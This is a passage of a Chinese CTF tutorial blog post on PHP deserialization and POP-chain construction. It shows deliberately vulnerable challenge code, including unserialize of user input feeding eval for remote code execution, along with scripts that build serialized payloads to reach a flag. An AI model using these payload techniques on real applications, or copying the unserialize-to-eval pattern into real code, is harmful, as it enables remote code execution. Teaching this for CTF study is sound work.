data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" 
data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-300x220.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-1024x751.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-1024x751.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-73\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uafdea8bc\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"547\" data-attachment-id=\"74\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=74\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png\" data-orig-size=\"901,547\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44-300x182.png\" 
data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-74\"  sizes=\"auto, (max-width: 901px) 100vw, 901px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u014a21eb\">\u6210\u529f\u89e6\u53d1\u4e86\u5176\u4e2d\u7684__destruct<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BzoFO\">\u4f8b\u98982<\/h4>\n\n\n\n<p id=\"ua29ee5fa\">\u6211\u4eec\u518d\u6765\u770b\u4e00\u9053\u7b80\u5355\u7684\u4f8b\u9898\uff0c\u8fd9\u9898\u76f8\u5bf9\u800c\u8a00\u96be\u5ea6\u66f4\u4f4e\uff0c\u56e0\u4e3a\u4e0d\u6d89\u53ca\u9b54\u672f\u65b9\u6cd5<\/p>\n\n\n\n<pre id=\"o2OIW\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    public $a = 'echo \"this is test!!\";';\n    public function displayVar() {\n        eval($this-&gt;a);\n    }\n}\n\n$get = $_GET&#91;\"benben\"];\n$b = unserialize($get);\n$b-&gt;displayVar() ;\n\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u1477d864\">\u4e0d\u9700\u8981\u4efb\u4f55\u7684\u6761\u4ef6\uff0c\u4ed6\u4f1a\u6267\u884c$a\u4e2d\u7684\u4ee3\u7801\uff0c\u800c\u53cd\u5e8f\u5217\u5316\u51fa\u6765\u7684\u5bf9\u8c61\u7684$a\u5b8c\u5168\u7531\u4f20\u5165\u7684\u5b57\u7b26\u4e32\u51b3\u5b9a\uff0c\u90a3\u4e48\u53ea\u9700\u8981\u4fee\u6539$a \u7136\u540e\u5c06test\u8fd9\u4e2a\u7c7b\u8fdb\u884c\u5e8f\u5217\u5316\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"726\" height=\"614\" data-attachment-id=\"75\" 
data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=75\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png\" data-orig-size=\"726,614\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45-300x254.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-75\"  sizes=\"auto, (max-width: 726px) 100vw, 726px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u00f9c583\">\u672c\u5730\u6d4b\u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-1024x731.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"731\" data-attachment-id=\"76\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=76\" 
data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46.png\" data-orig-size=\"1478,1055\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-300x214.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-1024x731.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-1024x731.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-76\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u20e35d75\">\u53ef\u4ee5\u76f4\u63a5rce<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"j8YnK\">pop\u94fe\u6784\u9020<\/h3>\n\n\n\n<p id=\"u5d14c4aa\">pop\u94fe\u662f\u901a\u8fc7\u89e6\u53d1\u9b54\u672f\u65b9\u6cd5\uff0c\u7136\u540e\u89e6\u53d1\u5176\u4ed6\u9b54\u672f\u65b9\u6cd5\uff0c\u7136\u540e\u4e00\u76f4\u5f80\u4e0b\u89e6\u53d1\uff0c\u76f4\u5230\u8fbe\u5230\u6700\u7ec8\u76ee\u7684\u83b7\u53d6flag<\/p>\n\n\n\n<p id=\"uabb3ba3c\">\u4e00\u822c\u7684CTF\u9898\u76ee\u4e2d\uff0c\u5927\u591a\u60c5\u51b5\u662f3-9\u4e2a\u7c7b\uff0c\u4e0d\u4f1a\u5199\u7279\u522b\u7279\u522b\u591a\uff0c\u6709\u4e9b\u65f6\u5019\u4e5f\u4f1a\u6709\u8ff7\u60d1\u4f60\u7684\u7c7b\uff0c\u8ba9\u4f60\u8d70\u4e0d\u901a\u94fe\u5b50<\/p>\n\n\n\n<p 
id=\"uf9ffd0a8\">\u4e00\u822c\u62ff\u5230php\u53cd\u5e8f\u5217\u5316\u9898\u76ee\u7684\u65f6\u5019\uff0c\u9996\u5148\u9700\u8981\u627e\u94fe\u5c3e\uff0c\u4e5f\u5c31\u662f\u6700\u5173\u952e\u7684\u4e00\u4e2a\u7528\u4e8e\u83b7\u53d6flag\u7684\u7c7b\uff0c\u53ef\u80fd\u662frce\uff0c\u53ef\u80fd\u662fecho flag<\/p>\n\n\n\n<p id=\"ue22e79a3\">\u63a5\u4e0b\u6765\u7531\u6d45\u5165\u6df1\u6162\u6162\u5e26\u5927\u5bb6\u5206\u6790<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"Q9Hsv\">\u4f8b\u98981<\/h4>\n\n\n\n<pre id=\"xy0cU\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\n\nclass NSS1 {\n    var $name;\n\n    function __destruct() {\n        echo $this-&gt;name;\n    }\n}\n\nclass NSS2 {\n    var $name;\n\n    function __toString()\n    {\n        echo getenv('FLAG');\n    }\n}\n\nunserialize($_GET&#91;'n']);<\/code><\/pre>\n\n\n\n<p id=\"ucd9343d5\">\u975e\u5e38\u7b80\u77ed\u7684\u94fe\u5b50\uff0c\u5927\u5bb6\u53ef\u4ee5\u56de\u987e\u4e00\u4e0b__destruct\u548c__toString\u7684\u89e6\u53d1\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"ua79c0070\">__destruct\u662f\u6790\u6784\u51fd\u6570\uff0c\u662f\u5728\u5bf9\u8c61\u88ab\u9500\u6bc1\u7684\u65f6\u5019\u81ea\u52a8\u6267\u884c\u7684\u4e00\u4e2a\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"uba98726a\">\u4e5f\u5c31\u662f\u5728new\u51fa\u6765\u7684\u5bf9\u8c61\u88ab\u9500\u6bc1\u7684\u65f6\u5019\u89e6\u53d1\uff1b__toString\u7684\u89e6\u53d1\u6761\u4ef6\u662fecho\u628a\u5bf9\u8c61\u5f53\u6210\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u56c7dd2b\">pop\u94fe\u4e5f\u5c31\u5f88\u6e05\u6670\u4e86<\/p>\n\n\n\n<pre id=\"BX7Mh\" class=\"wp-block-code\"><code>NSS1::__destruct-&gt;NSS2::__toString:echo getenv('FLAG');<\/code><\/pre>\n\n\n\n<p id=\"u87a44414\">\u9996\u5148new\u5b9e\u4f8b\u5316\u4e00\u4e2a\u7c7b<\/p>\n\n\n\n<pre id=\"UJTeX\" class=\"wp-block-code\"><code>$nss = new NSS1();<\/code><\/pre>\n\n\n\n<p id=\"ucdd1828a\">\u8fd9\u6837\u5c31\u53ef\u4ee5\u89e6\u53d1__destruct<\/p>\n\n\n\n<p 
id=\"u6082644f\">\u63a5\u4e0b\u6765\u628anss1\u4e2decho\u7684name\u6307\u5b9a\u4e3anss2\u5bf9\u8c61<\/p>\n\n\n\n<pre id=\"Wn8aB\" class=\"wp-block-code\"><code>$nss-&gt;name = new NSS2();<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"77\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=77\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-77\"  sizes=\"auto, (max-width: 1024px) 100vw, 
1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u12ff401a\">\u6211\u6709\u4e00\u4e2a\u4e60\u60ef\uff0c\u5c31\u662f\u5728\u6bcf\u4e2a\u9b54\u672f\u65b9\u6cd5\u540e\u9762\u52a0\u4e00\u4e2aecho \u201c\u89e6\u53d1\u4e86xxx\u9b54\u672f\u65b9\u6cd5\u201d\uff0c\u8fd9\u6837\u53ef\u4ee5\u770b\u5230\u81ea\u5df1\u7684\u94fe\u5b50\u662f\u5426\u8d70\u901a\u4e86\u4ee5\u53ca\u5224\u65ad\u94fe\u5b50\u65ad\u5728\u4e86\u54ea\u91cc<\/p>\n\n\n\n<p id=\"u54a0317c\">pop\u94fe<\/p>\n\n\n\n<pre id=\"x74ft\" class=\"wp-block-code\"><code>&lt;?php\n\nclass NSS1 {\n    var $name;\n\n    function __destruct() {\n        echo \"__destruct\u89e6\u53d1\".PHP_EOL;\n        echo $this-&gt;name;\n    }\n}\n\nclass NSS2 {\n    var $name;\n\n    function __toString()\n    {\n        echo getenv('FLAG');\n        echo \"ToString\u89e6\u53d1\".PHP_EOL;\n    }\n}\n\n\/\/ unserialize($_GET&#91;'n']);\n$nss = new NSS1();\n$nss-&gt;name = new NSS2();\necho serialize($nss ) .PHP_EOL;\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"78\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=78\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-78\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc6844e0d\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-1024x466.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"466\" data-attachment-id=\"79\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=79\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49.png\" data-orig-size=\"1919,874\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-300x137.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-1024x466.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-1024x466.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-79\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"HJt6S\">\u4f8b\u98983<\/h4>\n\n\n\n<pre id=\"omYNQ\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\n\nclass NSS1 {\n    var $name;\n\n    function __destruct() {\n        echo $this-&gt;name;\n    }\n}\n\nclass NSS2 {\n    var $name;\n\n    function __toString()\n    {\n        echo $this-&gt;name-&gt;test;\n    }\n}\n\nclass NSS3 {\n    var $name;\n    var $res;\n\n    function __get($name){\n        $this-&gt;name-&gt;getflag();\n    }\n\n    function __call($name, $arguments){\n        if ($this-&gt;res === 'nssctf') {\n            echo getenv('FLAG');\n        }\n    }\n}\nunserialize($_GET&#91;'n']);<\/code><\/pre>\n\n\n\n<p 
id=\"ub4e94a08\">\u7c7b\u53d8\u6210\u4e863\u4e2a\uff0c\u9996\u5148\u5224\u65ad\u94fe\u5c3e\uff0c\u7136\u540e\u6839\u636e\u94fe\u5c3e\u7684\u9b54\u672f\u65b9\u6cd5\u6162\u6162\u53cd\u63a8\uff0c\u94fe\u5c3e\u4e00\u770b\u5c31\u662f\u5728NSS3\u7684__call<\/p>\n\n\n\n<p id=\"u27fd2988\">\u56de\u5fc6\u4e00\u4e0b__call\u8981\u600e\u4e48\u89e6\u53d1<\/p>\n\n\n\n<p id=\"ubd3c7850\">\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u7684\u65f6\u5019\u4f1a\u89e6\u53d1__call\uff0c\u5e76\u4f20\u5165\u8be5\u65b9\u6cd5\u7684\u540d\u79f0\u548c\u53c2\u6570<\/p>\n\n\n\n<p id=\"u099998d2\">\u53d1\u73b0\u4ed6\u7684__get\u65b9\u6cd5\u89e6\u53d1\u7684getflag()\u6839\u672c\u5c31\u4e0d\u5b58\u5728\uff0c__call\u7684\u89e6\u53d1\u6761\u4ef6\u5c31\u662f\u8c03\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"u36e7812d\">\u7136\u540e\u53d1\u73b0NSS2\u6709\u4e00\u4e2a__toString \u4ed6\u6267\u884c\u7684\u4ee3\u7801\u662f$this-&gt;name-&gt;test;<\/p>\n\n\n\n<p id=\"u79049d33\">\u8fd9\u4e2aname\u662f\u53ef\u4ee5\u63a7\u5236\u7684\uff0c\u53ea\u8981\u8ba9\u4ed6\u8c03\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u6210\u5458\u5c5e\u6027\u5c31\u53ef\u4ee5\u89e6\u53d1__get\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\u5c31\u662f\u901a\u8fc7NSS1\u7684__destruct\u6765echo\u89e6\u53d1__toString\u4e86\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06name\u6307\u5411nss3 \u8fd9\u6837\u5c31\u53ef\u4ee5\u8bbf\u95eeNSS3\u8fd9\u4e2a\u7c7b\u5e76\u4e14\u89e6\u53d1__get<\/p>\n\n\n\n<p id=\"u7acfbde6\">\u5f53\u89e6\u53d1__get\u65f6$this-&gt;name-&gt;getflag();\u81ea\u52a8\u89e6\u53d1__call<\/p>\n\n\n\n<p id=\"u2dfdb2b5\">\u8fdb\u5165__call\u4ee5\u540e<\/p>\n\n\n\n<pre id=\"pCHPI\" class=\"wp-block-code\"><code>($this-&gt;res === 'nssctf')<\/code><\/pre>\n\n\n\n<p id=\"uf3a37038\">\u5c06NSS3\u7684res\u8bbe\u7f6e\u4e3anssctf\u5373\u53ef\u89e6\u53d1\u63a5\u4e0b\u6765\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"80\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=80\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-80\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u20759204\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-1024x576.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"81\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=81\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" 